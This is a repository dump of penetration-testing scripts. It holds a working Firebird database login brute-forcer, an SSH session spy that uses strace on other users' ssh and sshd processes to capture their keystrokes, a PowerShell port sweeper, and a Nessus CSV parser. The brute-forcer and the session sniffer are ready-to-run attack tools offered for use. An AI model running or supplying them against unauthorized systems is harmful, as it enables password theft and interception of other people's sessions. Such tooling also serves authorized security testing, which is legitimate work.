├── README.md
├── firebird-bruteforce.sh
├── portsweep.ps1
├── sshspy.sh
└── yanp.sh

/README.md:
--------------------------------------------------------------------------------
# Scripts

**firebird-bruteforce.sh**

```
# Usage:
firebird-bruteforce.sh <host> <user> <wordlist>

# Example:
firebird-bruteforce.sh 10.1.10.101 SYSDBA pwdlist.txt
```

More information here: https://www.infosecmatter.com/firebird-database-exploitation/

---

**yanp.sh**

Yet Another Nessus Parser.

It takes every Nessus CSV report found in the current working directory and parses out the following information from each report:

- List of found IP addresses
- List of resolved hostnames and corresponding IP addresses
- List of open TCP and UDP ports
- List of URLs (http and https)
- List of vulnerabilities and, for every vulnerability:
  - List of affected IP addresses
  - List of CVEs

Finally, it consolidates everything and produces combined results across all the Nessus reports.

```
# Usage:
cd /directory/with/nessus/results
yanp.sh
```

More information here: https://www.infosecmatter.com/nessus-csv-parser-and-extractor/

---

**portsweep.ps1**

A simple port sweeper, which scans a list of hosts for an open port.

It keeps its results in a file in the current working directory, so it can be interrupted and resumed (hosts that were already scanned are not scanned again).
48 | 49 | ``` 50 | Import-Module .\portsweep.ps1 51 | 52 | # Usage: 53 | portsweep 54 | 55 | # Example: 56 | portsweep ips.txt 445 57 | 58 | # Check results (find open ports): 59 | gc portsweep.*.txt | select-string True 60 | ``` 61 | -------------------------------------------------------------------------------- /firebird-bruteforce.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # contact@infosecmatter.com 3 | 4 | host="$1" 5 | user="$2" 6 | wordlist="$3" 7 | 8 | if [ ! -f "${wordlist}" ] || [ -z "${user}" ]; then 9 | echo "usage: `basename $0` " 10 | exit 1 11 | fi 12 | 13 | echo "`date`: FireBird login attack on ${host} against ${user} user using ${wordlist} wordlist" 14 | 15 | tr -d '\r' <"${wordlist}" | while read pwd; do 16 | echo "`date`: Trying ${pwd}" 17 | 18 | echo "CONNECT '${host}/3050:a' user '${user}' password '${pwd}';" | isql-fb -q 2>&1 | \ 19 | grep -q "The system cannot find the file specified." && { 20 | echo "Password for user ${user} is: ${pwd}" 21 | exit 0 22 | } 23 | done 24 | 25 | -------------------------------------------------------------------------------- /portsweep.ps1: -------------------------------------------------------------------------------- 1 | Function portsweep { 2 | param($list,$port) 3 | 4 | if (!$port) { 5 | Write-Host "usage: portsweep " 6 | Write-Host " e.g.: portsweep ips.txt 445`n" 7 | return 8 | } 9 | $results = ".\portsweep.$port.txt" 10 | 11 | foreach($line in Get-Content $list) { 12 | $x = (gc $results -EA SilentlyContinue | select-string "^$line,$port,") 13 | if ($x) { 14 | gc $results | select-string "^$line,$port," 15 | continue 16 | } 17 | $output = "$line,$port," 18 | 19 | $c = new-object system.net.sockets.tcpclient 20 | $c.SendTimeout = 500 21 | try { 22 | $c.Connect($line,$port) 23 | } catch {} 24 | if ($c.Connected) { 25 | $output += "True" 26 | } else { 27 | $output += "False" 28 | } 29 | Write-Host "$output" 30 | echo $output >>$results 31 | } 
32 | } 33 | -------------------------------------------------------------------------------- /sshspy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # contact@infosecmatter.com 3 | 4 | trap 'rm -f -- ${tmpfile}; exit' INT 5 | 6 | tmpfile="/tmp/$RANDOM$$$RANDOM" 7 | pgrep -a -f '^ssh ' | while read pid a; do echo "OUTBOUND $a $pid"; done >${tmpfile} 8 | pgrep -a -f '^sshd: .*@' | while read pid a; do 9 | tty="${a##*@}" 10 | from="`w | grep ${tty} | awk '{print $3}'`" 11 | echo "INBOUND $a (from $from) $pid" 12 | done >>${tmpfile} 13 | 14 | IFS=$'\n'; select opt in `cat ${tmpfile}`; do 15 | rm -f -- ${tmpfile} 16 | pid="${opt##* }" 17 | wfd="[0-9]" 18 | rfd="[0-9]" 19 | strace -e read,write -xx -s 9999999 -p ${pid} 2>&1 | while read -r a; do 20 | if [[ "${a:0:10}" =~ ^write\(${wfd}, ]] \ 21 | && [ ${#wfd} -le 3 ] \ 22 | && ! [[ "$a" =~ \ =\ 1$ ]]; then 23 | echo -en "`cut -d'"' -f2 <<<${a}`" 24 | elif [[ "${a:0:10}" =~ ^read\(${rfd}, ]] \ 25 | && [ ${#rfd} -le 3 ]; then 26 | echo -en "`cut -d'"' -f2 <<<${a}`" 27 | elif [[ "$a" =~ ^read\((${rfd}+),.*\ =\ [1-9]$ ]]; then 28 | fd="${BASH_REMATCH[1]}" 29 | if [[ "$a" =~ \ =\ 1$ ]]; then 30 | rfd="$fd" 31 | fi 32 | elif [[ "${a:0:10}" =~ ^write\((${wfd}+), ]] \ 33 | && [ ${#wfd} -gt 4 ]; then 34 | fd="${BASH_REMATCH[1]}" 35 | if [[ "${a}" =~ \\x00 ]]; then continue; fi 36 | if [[ "${a}" =~ \ =\ 1$ ]] || [[ "${a}" =~ \"\\x0d\\x0a ]]; then 37 | wfd="$fd" 38 | fi 39 | fi 40 | done 41 | echo ">> SSH session ($opt) closed" 42 | exit 0 43 | done 44 | 45 | -------------------------------------------------------------------------------- /yanp.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Postprocess Nessus scan results exported as CSV and parse out 4 | # vulnerabilities, unique IPs, URLs, open ports and resolved hostnames 5 | # 6 | # Version: 1.0 7 | # Contact: dev@infosecmatter.com 8 | 
#######################################################################
#
# Processing model, as implemented below:
#   * every *.csv in the current directory is treated as one Nessus report;
#   * each report is first flattened into "<report>.tmp" (one CSV record per
#     line) and then mined for several per-report result files named
#     "<report without .csv>-<output name>";
#   * a per-report result file that already exists is treated as a cache and
#     is NOT regenerated (delete it to force a re-parse of that report);
#   * finally all per-report files are merged into the consolidated output
#     files named below, and only the "<report>.tmp" copies are removed.
#
# Column numbers used with cut -d'"' / awk -F '"' assume the Nessus CSV column
# order Plugin ID, CVE, CVSS, Risk, Host, Protocol, Port, Name, ..., Plugin
# Output (so "-f4" is CVE, "-f10" Host, "-f12" Protocol, "-f14" Port,
# "-f16" Name and awk "$26" Plugin Output). NOTE(review): the script never
# reads the header row, so confirm this against the actual export format.
#
# NOTE(review): values taken from the report (host, port, plugin name) are
# interpolated unescaped into grep patterns and, in the URL section, into an
# awk program string built from a shell variable. A plugin name containing
# regex metacharacters can over- or under-match, and "^10.1.1.1" also
# matches 10.1.1.10 because the dots are unescaped and there is no end
# anchor. Scan exports contain text echoed from scanned hosts, so treat
# them as untrusted input; grep -F and awk -v would make these lookups
# literal.
#
# Requires GNU tools: sort -V and the sed \L (lowercase) extension.

# output file names
out_alive_hosts="hosts.txt"
out_hosts_resolved="hosts.resolved.txt"
out_open_ports="open.ports.txt"
out_url_list="urls.txt"
out_vulns_cve_list="vulns.cve.list.txt"
out_vulns_with_ports="vulns.hosts.with.ports.txt"
out_vulns_without_ports="vulns.hosts.without.ports.txt"

# start processing
# NOTE(review): nullglob is not set, so with no *.csv present the loop runs
# once on the literal name "*.csv" and the tr below fails on a missing file.
for report in *.csv; do
  echo "`date`: processing report ${report}"

  # Flatten the report: drop all line breaks (multi-line Plugin Output cells),
  # then start a new line in front of every record (records begin with a
  # quoted numeric Plugin ID following a closing quote) and after the header's
  # last column name, so the rest of the script can work line by line.
  tr -d '\n\r' <"${report}" | sed -e 's/""\([0-9]\+\)"/"\n"\1"/g;s/,Plugin Output"/,Plugin Output\n"/g' >"${report}.tmp"

  # # # # # hosts
  # Unique scanned IPs: records with a quoted dotted-quad, 5th comma-separated
  # column, de-quoted, version-sorted, deduplicated. NOTE(review): the column
  # is counted by raw commas, so a comma inside an earlier quoted field would
  # shift the selection.
  if [ -f "${report/.csv/}-${out_alive_hosts}" ]; then
    echo "`date`: parsing out list of unique hosts seen ..already done"
  else
    echo "`date`: parsing out list of unique hosts seen"
    grep '","[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+","' <"${report}.tmp" | \
      cut -d',' -f5 | tr -d '"' | sort -V | uniq >"${report}-${out_alive_hosts}.tmp"
    mv -f -- "${report}-${out_alive_hosts}.tmp" "${report/.csv/}-${out_alive_hosts}"
  fi

  # # # # # resolved hostnames
  # From records whose text contains "<ip> resolves as <name>": keep the text
  # after the last '","', drop " resolves as", strip the trailing dot/quote
  # and lowercase it. Result lines are "<ip> <hostname>", which the URL
  # section below looks up with awk.
  if [ -f "${report/.csv/}-${out_hosts_resolved}" ]; then
    echo "`date`: parsing out list of resolved hostnames ..already done"
  else
    echo "`date`: parsing out list of resolved hostnames"
    grep '[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+ resolves as ' <"${report}.tmp" | \
      sed -e 's/.*","//g;s/ resolves as//g;s/\.$//g;s/\."$//g;s/\(.*\)/\L\1/' | sort -V | uniq > "${report}-${out_hosts_resolved}.tmp"
    mv -f -- "${report}-${out_hosts_resolved}.tmp" "${report/.csv/}-${out_hosts_resolved}"
  fi

  # # # # # urls
  # For every record mentioning "A web server is running on this port" emit
  # "<host> <port> <plugin output>"; the exact sentence with a trailing period
  # is treated as plain HTTP, the "... through ..." variant as HTTPS, and any
  # other wording is reported as HTTPS but flagged "NOT SURE". Each URL is
  # also repeated for every hostname resolved for that IP (all reports'
  # resolved-hostname files are consulted, not only the current one).
  if [ -f "${report/.csv/}-${out_url_list}" ]; then
    echo "`date`: parsing out list of unique URLs seen ..already done"
  else
    echo "`date`: parsing out list of unique URLs seen"
    sed -e 's/""\([0-9]\+\)"/"\n"\1"/g' <"${report}.tmp" | \
      awk -F '"' '/A web server is running on this port/{print $10,$14,$26}' | \
      sort -V | uniq | while read ip port msg; do
      if [ "${msg}" == "A web server is running on this port." ]; then
        echo "http://${ip}:${port}/"
        # NOTE(review): ${ip} becomes part of the awk program text (unescaped
        # regex, no end anchor) - see the header note.
        awk "/^${ip}/{print \$2}" *-${out_hosts_resolved} | sort | uniq | while read host; do
          echo "http://${host}:${port}/"
        done
      elif [[ "${msg}" =~ "A web server is running on this port through" ]]; then
        echo "https://${ip}:${port}/"
        awk "/^${ip}/{print \$2}" *-${out_hosts_resolved} | sort | uniq | while read host; do
          echo "https://${host}:${port}/"
        done
      else
        echo "https://${ip}:${port}/ (NOT SURE !!! $msg)"
        awk "/^${ip}/{print \$2}" *-${out_hosts_resolved} | sort | uniq | while read host; do
          echo "https://${host}:${port}/ (NOT SURE !!! $msg)"
        done
      fi
    done | sort -V | uniq >"${report}-${out_url_list}.tmp"
    mv -f -- "${report}-${out_url_list}.tmp" "${report/.csv/}-${out_url_list}"
  fi

  # # # # # open ports
  # Records containing "was found to be open" -> "<host>;<port>;<protocol>"
  # (awk prints the three fields space-separated, tr turns spaces into ';').
  if [ -f "${report/.csv/}-${out_open_ports}" ]; then
    echo "`date`: parsing out open ports ..already done"
  else
    echo "`date`: parsing out open ports"
    sed -e 's/""\([0-9]\+\)"/"\n"\1"/g' <"${report}.tmp" | \
      awk -F '"' '/was found to be open/{print $10,$14,$12}' | tr ' ' ';' >"${report}-${out_open_ports}.tmp"
    mv -f -- "${report}-${out_open_ports}.tmp" "${report/.csv/}-${out_open_ports}"
  fi

  # # # # # vulns CVEs
  # One line per severity/plugin name: "<severity>;<name>;<CVE>, <CVE>, ...".
  # The severity is matched as a quoted word anywhere on the record (intended
  # to hit the Risk column); names are the unique non-empty 8th quoted
  # fields, and the CVE list is the unique 2nd quoted field of every record
  # carrying that name.
  if [ -f "${report/.csv/}-${out_vulns_cve_list}" ]; then
    echo "`date`: parsing out vulnerabilities and their CVEs ..already done"
  else
    echo "`date`: parsing out vulnerabilities and their CVEs"
    for sev in Critical High Medium Low None; do
      grep "\"${sev}\"" "${report}.tmp" | cut -d'"' -f16 | sort | uniq | grep -v '^$' | while read vuln; do
        echo -n "${sev};${vuln};"
        # NOTE(review): ${vuln} is used as an unescaped regex - see header note.
        grep "\"${vuln}\"" "${report}.tmp" | cut -d '"' -f4 | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//'
        echo
      done
    done >"${report}-${out_vulns_cve_list}.tmp"
    mv -f -- "${report}-${out_vulns_cve_list}.tmp" "${report/.csv/}-${out_vulns_cve_list}"
  fi

  # # # # # vulns affected hosts
  # Same structure as the CVE list, but the third field is the list of
  # affected "<host>:<port>" pairs (cut keeps the 5th and 7th quoted fields,
  # sed turns the separating quote into ':'). A second file with the ports
  # stripped is then derived from the first.
  if [ -f "${report/.csv/}-${out_vulns_without_ports}" ]; then
    echo "`date`: parsing out vulnerabilities and affected hosts ..already done"
  else
    echo "`date`: parsing out vulnerabilities and affected hosts"
    for sev in Critical High Medium Low None; do
      grep "\"${sev}\"" "${report}.tmp" | cut -d'"' -f16 | sort | uniq | grep -v '^$' | while read vuln; do
        echo -n "${sev};${vuln};"
        grep "\"${vuln}\"" "${report}.tmp" | cut -d '"' -f10,14 | sort -V | uniq | tr '\n' ',' | sed -e 's/"/:/g;s/,/, /g;s/, $//g'
        echo
      done
    done >"${report}-${out_vulns_with_ports}.tmp"
    mv -f -- "${report}-${out_vulns_with_ports}.tmp" "${report/.csv/}-${out_vulns_with_ports}"
    echo "`date`: parsing out vulnerabilities and affected hosts without ports"
    # Split each line at the LAST ';': everything before it is "<sev>;<name>",
    # after it the host list. NOTE(review): a plugin name containing ';'
    # would therefore be split in the wrong place.
    while read line; do
      vuln="${line%;*}"
      ips="${line##*;}"
      echo -n "${vuln};"
      # drop ":<port>" suffixes, re-split into one host per line, dedupe, re-join
      echo "${ips}" | sed -e 's/:[0-9]\+//g;s/,//g;s/ /\n/g' | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//'
      echo
    done <"${report/.csv/}-${out_vulns_with_ports}" >"${report}-${out_vulns_without_ports}.tmp"
    mv -f -- "${report}-${out_vulns_without_ports}.tmp" "${report/.csv/}-${out_vulns_without_ports}"
  fi
done

echo "`date`: done, now consolidating everything"

# Consolidation: each list below is the union of the matching per-report
# files, version-sorted and deduplicated, written into the current directory.

echo "`date`: generating ${out_alive_hosts}"
cat *-${out_alive_hosts} | sort -V | uniq > ${out_alive_hosts}.tmp
mv -f ${out_alive_hosts}.tmp ${out_alive_hosts}

echo "`date`: generating ${out_hosts_resolved}"
cat *-${out_hosts_resolved} | sort -V | uniq > ${out_hosts_resolved}.tmp
mv -f ${out_hosts_resolved}.tmp ${out_hosts_resolved}

echo "`date`: generating ${out_open_ports}"
cat *-${out_open_ports} | sort -V | uniq > ${out_open_ports}.tmp
mv -f ${out_open_ports}.tmp ${out_open_ports}

echo "`date`: generating ${out_url_list}"
# sort on the host part (3rd '/'-separated field) so URLs group by host
cat *-${out_url_list} | sort -t/ -k3 -V | uniq > ${out_url_list}.tmp
mv -f ${out_url_list}.tmp ${out_url_list}

# For the three vulnerability lists: collect the unique "<sev>;<name>" keys
# across all reports, merge each key's third field (", "-separated values are
# re-split on spaces, deduplicated and re-joined), then order the result by
# severity. NOTE(review): every per-report file is re-read once per key, so
# this is quadratic in the number of findings, and the key is again used as
# an unescaped grep regex.
echo "`date`: generating ${out_vulns_cve_list}"
cat *-${out_vulns_cve_list} | cut -d';' -f1,2 | sort | uniq | while read vuln; do
  echo -n "${vuln};"
  cat *-${out_vulns_cve_list} | grep "^${vuln};" | cut -d';' -f3 | tr -d ',' | tr -s ' ' '\n' | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//'
  echo
done > ${out_vulns_cve_list}.tmp
for sev in Critical High Medium Low None; do
  grep "^${sev};" ${out_vulns_cve_list}.tmp
done > ${out_vulns_cve_list}
rm -f ${out_vulns_cve_list}.tmp

# # # # # vulns
echo "`date`: generating ${out_vulns_with_ports}"
cat *-${out_vulns_with_ports} | cut -d';' -f1,2 | sort | uniq | while read vuln; do
  echo -n "${vuln};"
  cat *-${out_vulns_with_ports} | grep "^${vuln};" | cut -d';' -f3 | tr -d ',' | tr -s ' ' '\n' | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//'
  echo
done > ${out_vulns_with_ports}.tmp
for sev in Critical High Medium Low None; do
  grep "^${sev};" ${out_vulns_with_ports}.tmp
done > ${out_vulns_with_ports}
rm -f ${out_vulns_with_ports}.tmp

echo "`date`: generating ${out_vulns_without_ports}"
cat *-${out_vulns_without_ports} | cut -d';' -f1,2 | sort | uniq | while read vuln; do
  echo -n "${vuln};"
  cat *-${out_vulns_without_ports} | grep "^${vuln};" | cut -d';' -f3 | tr -d ',' | tr -s ' ' '\n' | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//'
  echo
done > ${out_vulns_without_ports}.tmp
for sev in Critical High Medium Low None; do
  grep "^${sev};" ${out_vulns_without_ports}.tmp
done > ${out_vulns_without_ports}
rm -f ${out_vulns_without_ports}.tmp

# # # # # cleanup
# Only the flattened "<report>.tmp" copies are removed; the per-report result
# files stay behind and act as the cache checked at the top of each section.
for report in *.csv; do
  echo "`date`: cleaning ${report}.tmp"
  rm -f -- "${report}.tmp"
done

echo "`date`: done"